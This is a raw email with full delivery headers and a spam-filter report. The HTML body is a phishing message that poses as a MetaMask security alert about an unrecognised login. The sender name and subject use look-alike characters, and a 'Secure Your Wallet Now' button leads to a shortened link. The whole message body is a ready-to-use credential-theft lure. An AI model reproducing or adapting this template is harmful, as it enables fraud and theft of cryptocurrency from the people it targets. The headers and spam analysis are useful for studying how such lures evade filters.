Return-Path: <postmaster@677a1742cb.nxcli.io>
Delivered-To: behniwal@server.rnv.kpw.mybluehostin.me
Received: from server.rnv.kpw.mybluehostin.me
	by server.rnv.kpw.mybluehostin.me with LMTP
	id EEaLI+PlfWhdBAAAyTkJsw
	(envelope-from <postmaster@677a1742cb.nxcli.io>)
	for <behniwal@server.rnv.kpw.mybluehostin.me>; Mon, 21 Jul 2025 01:01:55 -0600
Return-path: <postmaster@677a1742cb.nxcli.io>
Envelope-to: info@behniwalgroup.com
Delivery-date: Mon, 21 Jul 2025 01:01:55 -0600
Received: from cloudhost-3927890.us-midwest-1.nxcli.net ([209.87.149.245]:62204)
	by server.rnv.kpw.mybluehostin.me with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.95)
	(envelope-from <postmaster@677a1742cb.nxcli.io>)
	id 1udkX3-0001Q6-UV
	for info@behniwalgroup.com;
	Mon, 21 Jul 2025 01:01:55 -0600
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=default; d=677a1742cb.nxcli.io;
  b=bpDAOupLKXfDjdyZmkKfd04YbtBDHx5SdnxGgohEp26yKdLYV7kDqjpNbkXjlYnlh8XsZAswUNS2qbVTRMiLWoVs/8cdgzYa1BEYK9dJkxXGrICuZPwLB3GeYFPYSZrVawMDx1GqZp/9uk3Ug6Dqr4EMe6UskG7mcIHAl1uL9qVKVOHxYmxlg68GzOb4doZuuRVbMmQWTIsasNxa0NGcVfFUSGLgzg2d8CSSlLdzIuSt42eBjgfcwMHiVlRwnCqYyYnxoN22yMziDO7vDz53SOggbYBVTNhDM2VUdpSkBv+W1kST9xqplgVRQGhxDzrjxY5xFmADdwhkdWoIdGHLeQ==;
  h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=677a1742cb.nxcli.io; h=
	date:message-id:to:subject:from:reply-to:mime-version
	:content-type:list-unsubscribe; s=default; bh=e9QWXN8Z7ogbI578fP
	0XE17HI4W/NKdpLwF+Ax6u1k4=; b=jxhMxRNIlj+YnpdWB2N4XZdQj9JgPQXbCu
	k2c5NUaEgdC7L0gasIiEuoZCshnLXkqdeQQs8+jdRouA1t5lNFIbTHr90NTG/x83
	Gxlt4BGJci13a1UbUtQ6qEgtShaqaegQIIEjQ2yqFB6Y+ufkr//9+sw41mTR5qZA
	viIfGiZMPAQF+M3Bx2AJxitN08rQOfk1AYoZpidMDnOV/IEp4Tc1YXBEh3Z4Mqx4
	6pPu+345gwx/Va/lo+e6ioYJuyVqJGZzOEu7BCEkN6LpOi+oUL0s9y8nXSo8rbUs
	fB8TDHdOrbpVfquTU3P4zZ+E5F9dszik7o2ynuH/ZWPECw1LiaLA==
Received: (qmail 17648 invoked by uid 10183); 21 Jul 2025 06:07:23 +0000
Date: 21 Jul 2025 06:07:23 +0000
Message-ID: <20250721060723.17644.qmail@cloudhost-3927890.us-midwest-1.nxcli.net>
To: info@behniwalgroup.com
Subject: Wаllet Login Attempt – Vеrification Needed
X-PHP-Originating-Script: 10183:you.php
From: "MetаMаsk" <leuk8ul4@gpw.io>
Reply-To: leuk8ul4@gpw.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@leuk8ul4@gpw.io>
X-Spam-Status: No, score=3.7
X-Spam-Score: 37
X-Spam-Bar: +++
X-Ham-Report: Spam detection software, running on the system "server.rnv.kpw.mybluehostin.me",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Account Access Alert 🦊 Account Access Alert We’ve noticed
    a login from a device or location we don’t recognize. For your security,
    please review this activity. 
 Content analysis details:   (3.7 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: nxcli.io]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                            [209.87.149.245 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE:
                             The query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [209.87.149.245 listed in sa-accredit.habeas.com]
  0.2 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  3.2 FUZZY_WALLET           BODY: Obfuscated "Wallet"
  0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or
                             identical to background
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily
                             valid
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  0.1 DKIM_INVALID           DKIM or DK signature exists, but is not valid
  0.0 KAM_SHORT              Use of a URL Shortener for very short URL
X-Spam-Flag: NO


<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8" />
  <title>Account Access Alert</title>
</head>
<body style="margin:0; padding:20px; font-family:Arial, sans-serif; background:#f9fafb; color:#222222;">
  <table role="presentation" width="100%" cellpadding="0" cellspacing="0" style="max-width:540px; margin: auto; background:#ffffff; border:1px solid #ddd; border-radius:8px;">
    <tr>
      <td style="padding: 28px; text-align:center;">
        <span style="font-size:32px; display:block; line-height:1;">&#129418;</span>
        <h1 style="color:#f6851b; font-weight:600; margin:16px 0 24px; font-size:22px;">Account Access Alert</h1>
        <p style="font-size:16px; line-height:1.5; margin:0 0 22px;">
          We’ve noticed a login from a device or location we don’t recognize. For your security, please review this activity.
        </p>

        <table role="presentation" cellpadding="0" cellspacing="0" style="margin: 24px auto 16px;">
          <tr>
            <td align="center" bgcolor="#f6851b" style="border-radius:6px;">
              <a href="https://t.co/kznMmVK9zz?id=-4246336340915000630-6166" target="_blank" rel="noopener noreferrer" style="font-size:16px; color:#fff; text-decoration:none; padding: 14px 40px; display:inline-block; font-weight:700; font-family:Arial, sans-serif; letter-spacing: 0.03em; user-select:none;">
                &#8203;Secure Your Wallet Now&#8203;
              </a>
            </td>
          </tr>
        </table>

        <p style="font-size:13px; color:#888; margin-top:20px; font-style:italic;">
          If this was you, you don’t need to do anything further. Thank you for helping us keep your account safe.
        </p>
        <p style="font-size:12px; color:#bbb; margin-top:40px; user-select:none;">
          — MetaMask Security Team
        </p>
      </td>
    </tr>
  </table>
</body>
</html>